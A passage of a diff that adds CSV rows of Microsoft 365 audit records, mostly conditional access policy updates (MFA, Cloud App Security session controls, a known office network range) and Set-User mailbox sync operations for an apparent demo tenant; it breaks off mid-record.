+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/19/2020 2:55:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-19T02:55:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/19/2020 2:55:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-19T02:55:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/19/2020 2:55:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-19T02:55:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/19/2020 2:55:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T10:44:09Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-22T11:31:13Z,NT AUTHORITY\SYSTEM (Microsoft.Exchange.Management.ForwardSync),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-22T11:34:15Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-22T16:44:30Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-03-27T16:10:31Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\f5026109-05eb-4183-8788-e61a14040a44""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""ee9ea8b3-5b09-4c36-8739-24856720b373\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/27/2020 4:10:31 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-27T16:09:20Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-27T15:11:30.8107357Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/27/2020 4:09:19 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-27T14:34:51Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-27T14:33:06.2705101Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/27/2020 2:34:50 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-27T14:36:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-27T14:33:06.2705101Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/27/2020 2:36:30 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-27T14:43:02Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-27T14:33:06.2705101Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/27/2020 2:43:02 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-27T14:59:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-27T14:33:06.2705101Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/27/2020 2:59:23 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-27T14:59:26Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-27T14:33:06.2705101Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/27/2020 2:59:26 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-27T15:29:54Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-27T15:11:30.8107357Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/27/2020 3:29:54 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-27T15:12:37Z,,,New-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-03-27T15:12:50Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-27T15:11:30.8107357Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/27/2020 3:12:49 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-27T15:37:57Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-27T15:11:30.8107357Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/27/2020 3:37:56 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-27T15:37:58Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-27T15:11:30.8107357Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/27/2020 3:37:58 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-27T15:38:39Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\f5026109-05eb-4183-8788-e61a14040a44""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""ee9ea8b3-5b09-4c36-8739-24856720b373\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/27/2020 3:38:39 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-27T15:15:55Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\f5026109-05eb-4183-8788-e61a14040a44""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""ee9ea8b3-5b09-4c36-8739-24856720b373\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/27/2020 3:15:54 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-27T15:15:11Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-27T15:11:30.8107357Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/27/2020 3:15:10 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-27T15:22:09Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\f5026109-05eb-4183-8788-e61a14040a44""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""ee9ea8b3-5b09-4c36-8739-24856720b373\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/27/2020 3:22:09 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-27T15:21:28Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-27T15:11:30.8107357Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/27/2020 3:21:28 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T23:09:28Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-12T01:35:02Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 1:35:01 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-12T01:35:01Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 1:35:01 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T01:35:01Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 1:35:01 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T01:35:00Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 1:35:00 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T01:35:00Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 1:35:00 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T01:34:59Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 1:34:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
